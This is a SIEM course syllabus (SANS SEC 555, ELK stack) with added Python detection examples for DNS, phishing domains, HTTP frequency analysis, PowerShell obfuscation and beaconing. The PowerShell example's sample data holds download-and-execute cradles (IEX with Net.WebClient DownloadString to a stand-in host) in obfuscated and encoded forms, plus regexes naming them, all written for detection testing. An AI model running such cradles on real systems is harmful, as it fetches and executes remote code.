SEC 555 Course

In SEC 555 we walk through the intrusion-detection work that a SIEM performs in a security operations center, using the open-source ELK stack (Elasticsearch, Logstash, Kibana) as the SIEM. In this course we learn how to profile services and attach attributes to them so that intrusions can be detected, how to analyze endpoints and carry that analysis out properly in the SIEM, how to analyze user behavior with the open-source SIEM and detect abuse, and finally how to perform the complex analyses in the SIEM that are needed to identify an APT.

Course prerequisites

  • SEC 504
  • SEC 503
  • SEC 511

Course audience

  • Security specialists
  • Incident response team specialists
  • Security operations center (SOC) specialists

Course syllabus

State of the SOC/SIEM
  • Industry statistics
  • Industry problems

Log Monitoring
  • Assets
    • Windows/Linux
    • Network devices
    • Security devices
  • Data gathering strategies
    • Pre-planning
    • Logging architecture
    • Log inconsistencies
  • Log collection and normalization
  • Log retention strategies
  • Correlation and gaining context
  • Reporting and analytics
  • Alerting

SIEM platforms
  • Commercial solutions
  • Home-grown solutions

Planning a SIEM
  • Ingestion control
  • What to collect
  • Mission

SIEM Architecture
  • Ingestion techniques and nodes
  • Acceptance and manipulation for value
  • Augmentation of logs for detection
  • Data queuing and resiliency
  • Storage and speed
  • Analytical reporting
    • Visualizations
    • Detection Dashboards

Detection methods and relevance to log analysis
  • Attacker patterns
  • Attacker behaviors
  • Abnormalities

Analyzing common application logs that generate tremendous amounts of data

DNS
  • Finding new domains being accessed
  • Pulling in additional information such as domain age
  • Finding randomly named domains
  • Discover domain shadowing techniques
  • Identifying recon
  • Find DNS C2 channels
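
The first three DNS items above (new domains, domain age, randomly named domains) as one worked example in Python. This is an added illustration, not code from the course or from SANS: the DNS log lines, the registration-date table, the known-domain baseline and the analysis date are constructed, the entropy threshold is an assumption to be tuned against your own traffic, and the registrable-domain split is a simplification that a real deployment would replace with the Public Suffix List.

```python
import math
from collections import Counter
from datetime import date

# Constructed sample DNS query log (not from the course): timestamp, client, query name.
SAMPLE_DNS_LOG = """\
2024-03-01T09:00:01 10.0.0.5 www.example.com
2024-03-01T09:00:02 10.0.0.5 cdn.example.com
2024-03-01T09:00:03 10.0.0.7 mail.example.org
2024-03-01T09:00:04 10.0.0.9 kq8zx2vq7pmw9ydh.net
2024-03-01T09:00:05 10.0.0.9 x7f3k9qz2mwpr4tl.biz
2024-03-01T09:00:06 10.0.0.5 www.example.com
"""
TODAY = date(2024, 3, 1)   # analysis date matching the constructed log

# Stand-in for a domain-age enrichment source (WHOIS creation date or passive-DNS first seen).
# Assumption: a real pipeline would look these values up from such a feed.
REGISTRATION_DATES = {
    "example.com": date(1995, 8, 14),
    "example.org": date(1995, 8, 31),
    "kq8zx2vq7pmw9ydh.net": date(2024, 2, 27),
}

# Baseline of registrable domains already seen in historical logs (constructed assumption).
KNOWN_DOMAINS = {"example.com", "example.org"}

ENTROPY_THRESHOLD = 3.5        # bits per character; assumption, tune against your own baseline
NEW_DOMAIN_MAX_AGE_DAYS = 30   # "young" registration cut-off; assumption


def registered_domain(qname: str) -> str:
    """Reduce a query name to its registrable domain.
    Simplification: last two labels; a real deployment should use the Public Suffix List."""
    labels = qname.rstrip(".").lower().split(".")
    return ".".join(labels[-2:])


def shannon_entropy(text: str) -> float:
    """Bits of entropy per character: dictionary words score low, DGA-style labels score high."""
    if not text:
        return 0.0
    counts = Counter(text)
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_dns_log(text: str):
    for line in text.splitlines():
        ts, client, qname = line.split()
        yield {"ts": ts, "client": client, "qname": qname}


def analyze(log_text: str, today: date = TODAY) -> dict:
    """Return domains that are first-seen, random-looking, or registered very recently."""
    seen = set(KNOWN_DOMAINS)
    new, random_looking, young = set(), set(), {}
    for rec in parse_dns_log(log_text):
        reg = registered_domain(rec["qname"])
        if reg not in seen:                    # first time this registrable domain appears
            new.add(reg)
            seen.add(reg)
        label = reg.split(".")[0]
        if shannon_entropy(label) >= ENTROPY_THRESHOLD:
            random_looking.add(reg)
        created = REGISTRATION_DATES.get(reg)
        if created is not None:
            age = (today - created).days
            if age <= NEW_DOMAIN_MAX_AGE_DAYS:
                young[reg] = age
    return {"new": new, "random": random_looking, "young": young}


if __name__ == "__main__":
    for key, value in analyze(SAMPLE_DNS_LOG).items():
        print(key, value)
```

Entropy alone produces false positives on CDN and cloud hostnames, which is why the course pairs it with first-seen and domain-age context; in the example both random-looking names are also new, and one is three days old, so the three signals agree.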

HTTP
  • Use large datasets to find attacks
  • Identify bot traffic hiding in the clear
  • Discover requests that users do not make
  • Find ways to filter out legitimate noise
  • Use attacker randomness against them
  • Identify automated activity vs user activity
  • Filter approved web clients vs unauthorized
  • Find HTTP C2 channels

HTTPS
  • Alter information for large scale analysis
  • Analyze certificate fields to identify attack vectors
  • Track certificate validity
  • Apply techniques that overlap with standard HTTP
  • Find HTTPS C2 channels

SMTP
  • Identify where unauthorized email is coming from
  • Find compromised mail services
  • Fuzzy matching likely phishing domains
  • Data exfiltration detection
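
"Fuzzy matching likely phishing domains" above, as an added worked example in Python (not the course's own code): sender domains are folded for common look-alike substitutions, compared to a list of protected domains by edit distance, and also checked for a protected brand embedded in a longer name. The protected-domain list, the homoglyph table, the distance cut-off of 2 and the SMTP log lines are all assumptions constructed for this illustration.

```python
# Domains the organisation owns or does business with (assumption for this example).
PROTECTED_DOMAINS = ["example.com", "examplebank.com"]

# Character sequences attackers swap in because they look alike in common fonts (assumed table).
HOMOGLYPHS = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("|", "l")]

# Constructed SMTP log lines (not from the course): timestamp, MAIL FROM, RCPT TO.
SAMPLE_SMTP_LOG = """\
2024-03-01T10:00:00 alice@example.com bob@example.com
2024-03-01T10:00:05 it-support@exarnple.com bob@example.com
2024-03-01T10:00:09 billing@examp1e.com carol@example.com
2024-03-01T10:00:12 hr@exampel.com dave@example.com
2024-03-01T10:00:20 news@partner.net bob@example.com
2024-03-01T10:00:25 login@example-secure.com erin@example.com
"""


def normalize(label: str) -> str:
    """Fold look-alike sequences so that 'exarnple' and 'examp1e' both become 'example'."""
    out = label.lower()
    for lookalike, plain in HOMOGLYPHS:
        out = out.replace(lookalike, plain)
    return out


def levenshtein(a: str, b: str) -> int:
    """Edit distance (insert, delete, substitute) with a single rolling row."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(domain: str, protected=PROTECTED_DOMAINS, max_distance: int = 2):
    """Return (reason, protected_domain) when `domain` looks like a protected one, else None."""
    domain = domain.lower()
    if domain in protected:
        return None
    label = domain.split(".")[0]       # registrable label; simplification, no Public Suffix List
    norm = normalize(label)
    for p in protected:
        plabel = p.split(".")[0]
        pnorm = normalize(plabel)
        distance = levenshtein(norm, pnorm)
        if distance == 0:
            # identical after folding: either homoglyph swap or same label under another TLD
            return ("homoglyph" if label != plabel else "tld-variant", p)
        if distance <= max_distance:
            return ("near-miss", p)
        if pnorm in norm:
            return ("embedded-brand", p)
    return None


def sender_domain(address: str) -> str:
    return address.rsplit("@", 1)[1].lower()


def find_lookalikes(log_text: str) -> dict:
    """Map each suspicious sender domain in the log to its classification."""
    findings = {}
    for line in log_text.splitlines():
        _ts, mail_from, _rcpt_to = line.split()
        dom = sender_domain(mail_from)
        verdict = classify(dom)
        if verdict:
            findings[dom] = verdict
    return findings


if __name__ == "__main__":
    for dom, (reason, target) in find_lookalikes(SAMPLE_SMTP_LOG).items():
        print(f"{dom:24s} {reason:15s} looks like {target}")
```

A cut-off of 2 catches transpositions and single insertions but will also flag short legitimate domains that happen to be close; in practice apply it only to senders not already on an allow-list and weight the result by how recently the domain was registered.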

Apply threat intelligence to generic network logs

Active Dashboards and Visualizations
  • Correlate network datasets
  • Build frequency analysis tables
  • Establish network baseline activity
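
"Build frequency analysis tables" above, together with the HTTP items "Use attacker randomness against them", "Identify automated activity vs user activity" and "Filter approved web clients vs unauthorized", as one added worked example in Python (not code from the course): it stack-counts a log field, lists the least frequent values first with the number of distinct clients behind each, and filters requests against an allow-list of approved user-agents. The proxy log lines and the approved-agent prefix are constructed assumptions.

```python
from collections import Counter, defaultdict

# Constructed sample web-proxy log (not from the course): client, method, URI, user-agent, tab-separated.
SAMPLE_HTTP_LOG = "\n".join([
    "10.0.0.5\tGET\t/index.html\tMozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/122.0",
    "10.0.0.5\tGET\t/app.js\tMozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/122.0",
    "10.0.0.6\tGET\t/index.html\tMozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/122.0",
    "10.0.0.6\tGET\t/style.css\tMozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/122.0",
    "10.0.0.7\tGET\t/index.html\tMozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/122.0",
    "10.0.0.8\tGET\t/index.html\tMozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/122.0",
    "10.0.0.8\tGET\t/app.js\tMozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/122.0",
    "10.0.0.8\tGET\t/style.css\tMozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/122.0",
    "10.0.0.9\tGET\t/api/v1/status\tpython-requests/2.31",
    "10.0.0.9\tPOST\t/upload\tpython-requests/2.31",
    "10.0.0.11\tGET\t/\tMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
])
FIELDS = ("client", "method", "uri", "user_agent")

# Assumption: the organisation's managed browser build reports this user-agent prefix.
APPROVED_AGENT_PREFIXES = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/",)


def parse_http_log(text: str) -> list:
    return [dict(zip(FIELDS, line.split("\t"))) for line in text.splitlines()]


def frequency_table(records, field: str, by: str = "client") -> list:
    """Stack-count `field`: rows of (value, hits, distinct `by` values), least frequent first.
    The top of the table is the long tail where tooling and C2 clients stand out."""
    hits = Counter(r[field] for r in records)
    distinct = defaultdict(set)
    for r in records:
        distinct[r[field]].add(r[by])
    rows = [(value, count, len(distinct[value])) for value, count in hits.items()]
    return sorted(rows, key=lambda row: (row[1], row[0]))


def rare_values(table, max_hits: int = 2) -> list:
    """Long-tail entries: values seen at most `max_hits` times in the whole dataset."""
    return [row for row in table if row[1] <= max_hits]


def unapproved_clients(records) -> list:
    """Requests whose user-agent does not start with an approved prefix (allow-list filtering)."""
    return [r for r in records if not r["user_agent"].startswith(APPROVED_AGENT_PREFIXES)]


if __name__ == "__main__":
    recs = parse_http_log(SAMPLE_HTTP_LOG)
    table = frequency_table(recs, "user_agent")
    for value, count, clients in table:
        print(f"{count:3d} hits {clients:2d} clients  {value}")
    for row in rare_values(table):
        print("rare:", row[0])
    for r in unapproved_clients(recs):
        print("unapproved:", r["client"], r["user_agent"])
```

The same table works on any field (URI, method, destination host), and the distinct-client column is what separates a rare but widespread value from one host doing something nobody else does.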

Endpoint logs
  • Understanding value
  • Methods of collection
    • Agents
    • Agentless
    • Scripting
  • Adding additional logging
    • EMET
    • Sysmon
    • Group Policy

Windows filtering and tuning

Analyze critical events based on attacker patterns
  • Finding signs of exploitation
  • Find signs of internal reconnaissance
  • Finding persistence
  • Privilege escalation
  • Establishing a foothold
  • Cleaning up tracks

Host-based firewall logs
  • Discover internal pivoting
  • Identify unauthorized listening executables
  • See scan activity

Credential theft and reuse
  • Multiple failed logons
  • Unauthorized account use

Monitor PowerShell
  • Configure PowerShell logging
  • Identify obfuscation
  • Identify modern attacks
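
The "Identify obfuscation" item above, as an added worked example in Python (not code from the course or from SANS): it scores one script block, such as the text carried in a PowerShell script block logging event, against a small set of obfuscation indicators, strips token-splicing backticks before matching so that I`EX still matches, and decodes an -EncodedCommand payload (base64 of UTF-16LE) so the decoded command is scored as well. The indicator list, the weights, the thresholds and the five sample script blocks are all assumptions constructed for this illustration.

```python
import base64
import re

# powershell.exe accepts unambiguous prefixes of -EncodedCommand; this covers the common ones.
ENCODED_PATTERN = re.compile(r"-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/]{16,}={0,2})", re.I)

# (name, pattern, weight). Assumption: a heuristic list written for this example, not the course's rules.
INDICATORS = [
    ("invoke-expression", re.compile(r"\biex\b|invoke-expression", re.I), 2),
    ("download-cradle", re.compile(r"downloadstring|downloadfile|net\.webclient|invoke-webrequest", re.I), 2),
    ("encoded-command", ENCODED_PATTERN, 3),
    ("hidden-window", re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 1),
    ("char-code-building", re.compile(r"\[char\]\s*\d+", re.I), 2),
    ("string-reordering", re.compile(r"""\[\s*\d+\s*(?:,\s*\d+\s*)+\]|-join\s*['"]{2}""", re.I), 2),
    ("format-operator", re.compile(r"\{\d+\}[^\n]*-f\s", re.I), 2),
]
# Backticks that splice a token (I`EX) rather than start an escape sequence (`n, `t, ...).
# Simplification: the escape letters are matched in lowercase only.
SPLICE_BACKTICK = re.compile(r"`(?![ntabefrv0u])")
SYMBOL_RATIO_THRESHOLD = 0.3   # share of non-alphanumeric characters; assumption
ALERT_THRESHOLD = 3            # total weight that raises an alert; assumption

# Constructed sample script blocks (not real captures). The encoded one is built at import time.
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.200/c')"
SAMPLE_BLOCKS = {
    "benign": "Get-ChildItem -Path C:\\Users -Recurse | Where-Object { $_.Length -gt 1MB }",
    "cradle": "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.200/a.ps1')",
    "backticks": "IE`X (Ne`w-Ob`ject Net.WebClient).Downl`oadString('http://10.0.0.200/b')",
    "encoded": "powershell.exe -NoP -W Hidden -Enc " + base64.b64encode(_PAYLOAD.encode("utf-16le")).decode(),
    "charcodes": "& ([string]([char]73+[char]69+[char]88)) ('Get-Pro'+'cess')",
}


def strip_splicing_backticks(script: str) -> str:
    return SPLICE_BACKTICK.sub("", script)


def symbol_ratio(script: str) -> float:
    """Share of non-whitespace characters that are neither letters nor digits."""
    chars = [c for c in script if not c.isspace()]
    if not chars:
        return 0.0
    return sum(1 for c in chars if not c.isalnum()) / len(chars)


def analyze_script_block(script: str, depth: int = 0) -> dict:
    """Score a script block; an encoded payload is decoded and scored recursively (two levels max)."""
    found = []
    if len(SPLICE_BACKTICK.findall(script)) >= 2:
        found.append(("backtick-splicing", 3))
    if symbol_ratio(script) >= SYMBOL_RATIO_THRESHOLD:
        found.append(("high-symbol-density", 1))
    normalized = strip_splicing_backticks(script)
    for name, pattern, weight in INDICATORS:
        if pattern.search(normalized):
            found.append((name, weight))
    result = {"score": sum(w for _, w in found), "indicators": [n for n, _ in found], "decoded": None}
    match = ENCODED_PATTERN.search(normalized)
    if match and depth < 2:
        try:
            result["decoded"] = base64.b64decode(match.group(1)).decode("utf-16le")
        except (ValueError, UnicodeDecodeError):
            result["decoded"] = None
    if result["decoded"] is not None:
        inner = analyze_script_block(result["decoded"], depth + 1)
        result["score"] += inner["score"]
        result["indicators"] += [f"decoded:{n}" for n in inner["indicators"]]
    result["alert"] = result["score"] >= ALERT_THRESHOLD
    return result


if __name__ == "__main__":
    for name, block in SAMPLE_BLOCKS.items():
        r = analyze_script_block(block)
        print(f"{name:10s} score={r['score']:2d} alert={r['alert']} {r['indicators']}")
```

Regex indicators are brittle on their own; the value of script block logging is that the engine records the de-obfuscated code it actually runs, so the same scoring applied to the later 4104 events for the same session catches what the first layer hides.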

Security Architecture – Endpoint Protection
  • Anti-Malware
  • Host-based Firewall, Host-based IDS/IPS
  • Application Control, Application Virtualization
  • Privileged Accounts, Authentication, Monitoring, and UAC
  • Virtual Desktop Infrastructure
  • Browser Security
  • EMET and Defender Exploit Guard
  • Patching
    • Process
    • To Test or Not to Test
    • Microsoft
    • Third-Party

Centralize NIDS and HIDS alerts
  • Analyze endpoint security logs
  • Provide alternative analysis methods
  • Configure tagging to facilitate better reporting

Augment intrusion detection alerts
  • Extract CVE, OSVDB, etc. for further context
  • Pull in rule info and other info such as geo

Analyze vulnerability information
  • Set up vulnerability reports
  • Correlate CVE, OSVDB, and other unique IDs with IDS alerts
  • Prioritize IDS alerts based on vulnerability context

Correlate malware sandbox logs with other systems to identify victims across enterprise

Monitor Firewall Activity
  • Identify scanning activity on inbound denies
  • Apply auto response based on alerts
  • Find unexpected outbound traffic
  • Baseline allow/denies to identify unexpected changes
  • Apply techniques to filter out noise in denied traffic

SIEM tripwires
  • Configure systems to generate early log alerts after compromise
  • Identify file and folder scan activity
  • Identify user token stealing
  • Operationalize virtual honeypots with central logging
  • Allow phone home tracking

Post mortem analysis
  • Re-analyze network traffic
  • Identify malicious domains and IPs
  • Look for beaconing activity
  • Identify unusual time-based activity
  • Use threat intel to reassess previous data fields such as user-agents
  • Utilize hashes in log to constantly re-evaluate for known bad files
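
"Look for beaconing activity" and "Identify unusual time-based activity" above, as an added worked example in Python (not the course's own material): it groups connection records by source, destination and port, measures the median gap between connections and how far the gaps stray from it (median absolute deviation divided by the median), and flags pairs that call out on a near-constant schedule. The connection log, the 60-second beacon, and the thresholds (at least eight connections, jitter at most 0.1) are constructed assumptions for this illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from statistics import median

# Constructed connection log (not from the course): timestamp, source, destination, port, bytes.
# The first host reaches out roughly every 60 s with identical sizes (a beacon);
# the second browses in bursts with irregular gaps.
_BASE = datetime(2024, 3, 1, 9, 0, 0)


def _lines(src, dst, port, offsets, size):
    return [f"{(_BASE + timedelta(seconds=o)).isoformat()} {src} {dst} {port} {size}" for o in offsets]


SAMPLE_CONN_LOG = "\n".join(sorted(
    _lines("10.0.0.9", "203.0.113.5", 443, [0, 61, 119, 181, 240, 299, 361, 420, 479, 541], 612)
    + _lines("10.0.0.5", "198.51.100.20", 443, [0, 3, 4, 40, 45, 300, 301, 302, 900, 1500], 1480)
))


def profile_pairs(log_text: str, min_connections: int = 8) -> list:
    """Per (src, dst, port): connection count, median interval, jitter (MAD/median), size spread."""
    by_pair = defaultdict(list)
    for line in log_text.splitlines():
        ts, src, dst, port, size = line.split()
        by_pair[(src, dst, int(port))].append((datetime.fromisoformat(ts), int(size)))
    profiles = []
    for pair, events in by_pair.items():
        if len(events) < min_connections:      # too few points to judge regularity
            continue
        events.sort()
        deltas = [(later - earlier).total_seconds()
                  for (earlier, _), (later, _) in zip(events, events[1:])]
        interval = median(deltas)
        if interval <= 0:
            continue
        jitter = median(abs(d - interval) for d in deltas) / interval
        sizes = [s for _, s in events]
        profiles.append({
            "pair": pair,
            "count": len(events),
            "interval_s": interval,
            "jitter": round(jitter, 3),
            "size_spread": max(sizes) - min(sizes),
        })
    return profiles


def find_beacons(log_text: str, max_jitter: float = 0.1, **kwargs) -> list:
    """Pairs whose timing is regular enough to look machine-driven rather than user-driven."""
    return [p for p in profile_pairs(log_text, **kwargs) if p["jitter"] <= max_jitter]


if __name__ == "__main__":
    for p in profile_pairs(SAMPLE_CONN_LOG):
        flag = "BEACON" if p["jitter"] <= 0.1 else "      "
        print(flag, p["pair"], f"n={p['count']} every {p['interval_s']:.0f}s jitter={p['jitter']}")
```

Malware that randomises its sleep defeats a pure jitter test, so treat the interval check as one signal beside the constant payload size, the low distinct-destination count, and the off-hours timing the surrounding items describe; long-period beacons also need an analysis window many times longer than their interval.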